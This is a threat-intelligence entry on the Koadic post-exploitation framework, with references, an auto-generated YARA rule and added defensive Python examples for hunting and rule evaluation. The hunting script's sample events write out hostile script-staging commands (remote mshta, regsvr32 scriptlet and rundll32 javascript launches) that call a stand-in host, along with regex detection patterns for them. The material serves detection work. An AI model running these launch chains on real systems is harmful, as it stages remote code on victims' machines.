win.koadic

Koadic

Actor(s): APT28, Stone Panda


Koadic (COM Command & Control) is an open-source post-exploitation framework for Windows, written in Python by zerosum0x0 and published on GitHub. Its server generates JScript and VBScript payloads that run under the Windows Script Host; a stager can be dropped to disk or executed directly in memory, so an infected host need not carry an implant file at all. Capabilities include command execution, enabling remote desktop access, lateral movement over SMB, file upload and download, credential theft with Mimikatz, port scanning, and host reconnaissance, including collection of system information and of targeted files selected by name or extension.
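Because the implant stages are script rather than a dropped executable, the practical endpoint detection point is the launch chain: a script host or LOLBin pulling script from a remote URL. The following is an added example, not code from Koadic or from Malpedia, that runs that logic over a few constructed process-creation records. The four launch patterns it flags (mshta.exe with a remote HTA, regsvr32.exe /i:<url> scrobj.dll, rundll32.exe with a javascript: argument, and wscript/cscript running a script from a user-writable temp directory) are assumed here as the common Windows Script Host staging vectors; the sample records, the 203.0.113.10 address and the paths are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Sequence, Tuple

# Constructed process-creation records (parent image, child command line).
# These are NOT real telemetry; 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("winword.exe", r"C:\Windows\System32\mshta.exe http://203.0.113.10:9999/abc"),
    ("cmd.exe", r"regsvr32.exe /s /n /u /i:http://203.0.113.10:9999/xyz scrobj.dll"),
    ("explorer.exe",
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
     r'document.write();GetObject("script:http://203.0.113.10:9999/def")'),
    ("cmd.exe", r"cscript.exe C:\Users\alice\AppData\Local\Temp\update.js"),
    # Benign look-alikes that must not fire: a local HTA and a normal DLL registration.
    ("explorer.exe", r"C:\Windows\System32\mshta.exe C:\Program Files\Vendor\setup.hta"),
    ("services.exe", r"regsvr32.exe /s C:\Windows\System32\vendor.dll"),
]

URL = r"https?://"

# (rule name, compiled pattern). Each pattern keys on the launcher binary and
# then on the artefact that separates remote script staging from normal use.
RULES: List[Tuple[str, re.Pattern]] = [
    # mshta.exe handed a URL instead of a local .hta file
    ("mshta_remote_hta", re.compile(r"\bmshta(?:\.exe)?\b.*" + URL, re.I)),
    # regsvr32 "squiblydoo": scriptlet fetched over HTTP through scrobj.dll
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:" + URL + r".*\bscrobj\.dll\b", re.I)),
    # rundll32 executing an inline javascript: URL
    ("rundll32_javascript", re.compile(r"\brundll32(?:\.exe)?\b.*\bjavascript:", re.I)),
    # wscript/cscript running a script file out of a user-writable temp location
    ("wsh_script_from_user_temp",
     re.compile(r"\b[wc]script(?:\.exe)?\b.*\\(?:temp|appdata)\\.*\.(?:js|jse|vbs|vbe|wsf)\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    cmdline: str


def hunt(events: Sequence[Tuple[str, str]]) -> List[Finding]:
    """Return one Finding per (event, rule) pair whose command line matches."""
    findings: List[Finding] = []
    for parent, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(name, parent, cmdline))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] parent={f.parent} cmd={f.cmdline}")
```

The parent image is carried through because the same launcher from an Office process or a browser is a much stronger signal than from an installer; a production version would add that as a scoring factor rather than a hard filter.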

References

2024-01-25 | JSAC 2024 | Masafumi Takeda, Tomoya Furukawa
  Threat Intelligence of Abused Public Post-Exploitation Frameworks
  Tags: AsyncRAT, DCRat, Empire Downloader, GRUNT, Havoc, Koadic, Merlin, PoshC2, Quasar RAT, Sliver

2021-03-18 | PRODAFT Threat Intelligence | PRODAFT
  SilverFish Group Threat Actor Report
  Tags: Cobalt Strike, Dridex, Koadic

2021-02-24 | Malwarebytes | Hossein Jazi
  LazyScripter: From Empire to double RAT
  Tags: Octopus, Koadic

2021-01-13 | AlienVault | Tom Hegel
  A Global Perspective of the SideWinder APT
  Tags: 8.t Dropper, Koadic, SideWinder

2021-01-01 | SecureWorks
  Threat Profile: GOLD DRAKE
  Tags: Cobalt Strike, Dridex, FriedEx, Koadic, MimiKatz, WastedLocker, Evil Corp

2020-11-28 | pat_h/to/file
  Hunting Koadic Pt. 2 - JARM Fingerprinting
  Tags: Koadic

2020-03-20 | Bitdefender | Liviu Arsene
  5 Times More Coronavirus-themed Malware Reports during March
  Tags: ostap, HawkEye Keylogger, Koadic, Loki Password Stealer (PWS), Nanocore RAT, Remcos

2020-01-09 | Github (zerosum0x0) | zerosum0x0
  Koadic
  Tags: Koadic

2020-01-01 | Secureworks | SecureWorks
  COBALT TRINITY
  Tags: POWERTON, pupy, Imminent Monitor RAT, Koadic, Nanocore RAT, NetWire RC, PoshC2, APT33

2020-01-01 | Secureworks | SecureWorks
  GOLD DRAKE
  Tags: Dridex, Empire Downloader, FriedEx, Koadic, MimiKatz

2020-01-01 | Secureworks | SecureWorks
  COBALT ULSTER
  Tags: POWERSTATS, Koadic, MuddyWater

2018-06-06 | Palo Alto Networks Unit 42 | Bryan Lee, Robert Falcone
  Sofacy Group’s Parallel Attacks
  Tags: Koadic, Zebrocy
Yara Rules
[TLP:WHITE] win_koadic_auto (20230808 | Detects win.koadic.)
rule win_koadic_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2023-12-06"
        version = "1"
        description = "Detects win.koadic."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
        malpedia_rule_date = "20231130"
        malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
        malpedia_version = "20230808"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation are published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 0f84b4020000 53 56 57 8b7c2424 bb01000000 83ffff }
            // n = 7, score = 100
            //   0f84b4020000         | je                  0x2ba
            //   53                   | push                ebx
            //   56                   | push                esi
            //   57                   | push                edi
            //   8b7c2424             | mov                 edi, dword ptr [esp + 0x24]
            //   bb01000000           | mov                 ebx, 1
            //   83ffff               | cmp                 edi, -1

        $sequence_1 = { 035c2408 53 58 e8???????? a3???????? 8b5c2414 035c2408 }
            // n = 7, score = 100
            //   035c2408             | add                 ebx, dword ptr [esp + 8]
            //   53                   | push                ebx
            //   58                   | pop                 eax
            //   e8????????           |                     
            //   a3????????           |                     
            //   8b5c2414             | mov                 ebx, dword ptr [esp + 0x14]
            //   035c2408             | add                 ebx, dword ptr [esp + 8]

        $sequence_2 = { 83fb01 0f8da9000000 8b542404 ff35???????? e8???????? 8b15???????? }
            // n = 6, score = 100
            //   83fb01               | cmp                 ebx, 1
            //   0f8da9000000         | jge                 0xaf
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   ff35????????         |                     
            //   e8????????           |                     
            //   8b15????????         |                     

        $sequence_3 = { 50 8d4c2420 51 e8???????? e9???????? 6a08 }
            // n = 6, score = 100
            //   50                   | push                eax
            //   8d4c2420             | lea                 ecx, [esp + 0x20]
            //   51                   | push                ecx
            //   e8????????           |                     
            //   e9????????           |                     
            //   6a08                 | push                8

        $sequence_4 = { 3b1c24 7527 8b15???????? ff35???????? e8???????? 8d05c8334100 50 }
            // n = 7, score = 100
            //   3b1c24               | cmp                 ebx, dword ptr [esp]
            //   7527                 | jne                 0x29
            //   8b15????????         |                     
            //   ff35????????         |                     
            //   e8????????           |                     
            //   8d05c8334100         | lea                 eax, [0x4133c8]
            //   50                   | push                eax

        $sequence_5 = { 72f1 eb07 8b34c5c4124100 8bc6 8d5001 }
            // n = 5, score = 100
            //   72f1                 | jb                  0xfffffff3
            //   eb07                 | jmp                 9
            //   8b34c5c4124100       | mov                 esi, dword ptr [eax*8 + 0x4112c4]
            //   8bc6                 | mov                 eax, esi
            //   8d5001               | lea                 edx, [eax + 1]

        $sequence_6 = { 7507 c7450c02104100 53 56 8b7508 f6462c01 57 }
            // n = 7, score = 100
            //   7507                 | jne                 9
            //   c7450c02104100       | mov                 dword ptr [ebp + 0xc], 0x411002
            //   53                   | push                ebx
            //   56                   | push                esi
            //   8b7508               | mov                 esi, dword ptr [ebp + 8]
            //   f6462c01             | test                byte ptr [esi + 0x2c], 1
            //   57                   | push                edi

        $sequence_7 = { 50 68???????? ff35???????? e8???????? 21c0 7414 ff35???????? }
            // n = 7, score = 100
            //   50                   | push                eax
            //   68????????           |                     
            //   ff35????????         |                     
            //   e8????????           |                     
            //   21c0                 | and                 eax, eax
            //   7414                 | je                  0x16
            //   ff35????????         |                     

        $sequence_8 = { e8???????? 890424 6800000000 e8???????? a3???????? ff35???????? ff742404 }
            // n = 7, score = 100
            //   e8????????           |                     
            //   890424               | mov                 dword ptr [esp], eax
            //   6800000000           | push                0
            //   e8????????           |                     
            //   a3????????           |                     
            //   ff35????????         |                     
            //   ff742404             | push                dword ptr [esp + 4]

        $sequence_9 = { ff15???????? 8b542434 81c200000800 89542428 eb04 8b5c2414 8b442434 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   8b542434             | mov                 edx, dword ptr [esp + 0x34]
            //   81c200000800         | add                 edx, 0x80000
            //   89542428             | mov                 dword ptr [esp + 0x28], edx
            //   eb04                 | jmp                 6
            //   8b5c2414             | mov                 ebx, dword ptr [esp + 0x14]
            //   8b442434             | mov                 eax, dword ptr [esp + 0x34]

    condition:
        7 of them and filesize < 180224
}
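To make concrete what the condition above actually evaluates, the following added example (not part of this page, of Malpedia, or of YARA itself) re-implements the rule's matching in plain Python: each hex string becomes a bytes regex, with YARA's full-byte `??` wildcard mapped to a single arbitrary byte, and the condition `7 of them and filesize < 180224` is applied to the result. Two practitioner caveats are visible from the rule text: its strings are x86 instruction sequences taken from disassembly, so it applies to a compiled binary and not to the JScript or VBScript stages Koadic generates, and a sample padded past 180224 bytes does not match regardless of content. The hex bodies below are copied from the rule; the `build_sample` input is constructed only so the example runs offline and is not a Koadic sample. For real scanning, hand the rule text to yara-python rather than this reimplementation.

```python
import re
from typing import Dict, List, Sequence, Tuple

# Hex string bodies copied verbatim from win_koadic_auto above.
KOADIC_SEQUENCES: Dict[str, str] = {
    "$sequence_0": "0f84b4020000 53 56 57 8b7c2424 bb01000000 83ffff",
    "$sequence_1": "035c2408 53 58 e8???????? a3???????? 8b5c2414 035c2408",
    "$sequence_2": "83fb01 0f8da9000000 8b542404 ff35???????? e8???????? 8b15????????",
    "$sequence_3": "50 8d4c2420 51 e8???????? e9???????? 6a08",
    "$sequence_4": "3b1c24 7527 8b15???????? ff35???????? e8???????? 8d05c8334100 50",
    "$sequence_5": "72f1 eb07 8b34c5c4124100 8bc6 8d5001",
    "$sequence_6": "7507 c7450c02104100 53 56 8b7508 f6462c01 57",
    "$sequence_7": "50 68???????? ff35???????? e8???????? 21c0 7414 ff35????????",
    "$sequence_8": "e8???????? 890424 6800000000 e8???????? a3???????? ff35???????? ff742404",
    "$sequence_9": "ff15???????? 8b542434 81c200000800 89542428 eb04 8b5c2414 8b442434",
}
# condition: 7 of them and filesize < 180224
MIN_STRINGS = 7
MAX_FILESIZE = 180224


def hex_string_to_regex(hex_body: str) -> re.Pattern:
    """Compile a YARA hex string into a bytes regex.

    Only the constructs this rule uses are handled: literal byte pairs and the
    full-byte wildcard '??'. A nibble wildcard such as '8?' is rejected.
    """
    tokens = hex_body.replace(" ", "")
    if len(tokens) % 2:
        raise ValueError("hex string has an odd number of nibbles")
    parts: List[bytes] = []
    for i in range(0, len(tokens), 2):
        pair = tokens[i:i + 2]
        if pair == "??":
            parts.append(b".")                  # any single byte (DOTALL below)
        elif "?" in pair:
            raise ValueError(f"nibble wildcard {pair!r} not supported")
        else:
            int(pair, 16)                       # validates the two hex digits
            parts.append(("\\x" + pair).encode())
    return re.compile(b"".join(parts), re.DOTALL)


def scan(data: bytes,
         sequences: Dict[str, str] = KOADIC_SEQUENCES,
         min_strings: int = MIN_STRINGS,
         max_filesize: int = MAX_FILESIZE) -> Tuple[bool, Dict[str, List[int]]]:
    """Evaluate '<min_strings> of them and filesize < <max_filesize>' over data.

    Returns (matched, {string_name: [offsets...]}) so a hit can be triaged by
    which sequences fired and where.
    """
    hits: Dict[str, List[int]] = {}
    for name, body in sequences.items():
        offsets = [m.start() for m in hex_string_to_regex(body).finditer(data)]
        if offsets:
            hits[name] = offsets
    matched = len(hits) >= min_strings and len(data) < max_filesize
    return matched, hits


def build_sample(bodies: Sequence[str], filler: bytes = b"\x90" * 16) -> bytes:
    """Constructed test input, NOT a Koadic sample: each hex string with its
    wildcards filled by 0x41, separated by NOP padding."""
    out = bytearray()
    for body in bodies:
        out += bytes.fromhex(body.replace(" ", "").replace("??", "41"))
        out += filler
    return bytes(out)


if __name__ == "__main__":
    matched, hits = scan(build_sample(list(KOADIC_SEQUENCES.values())))
    print("matched:", matched, "strings hit:", sorted(hits))
```

Dropping to six sequences or padding the buffer past the size limit turns the verdict false, which is the behaviour to keep in mind when a packed or appended sample slips past this rule.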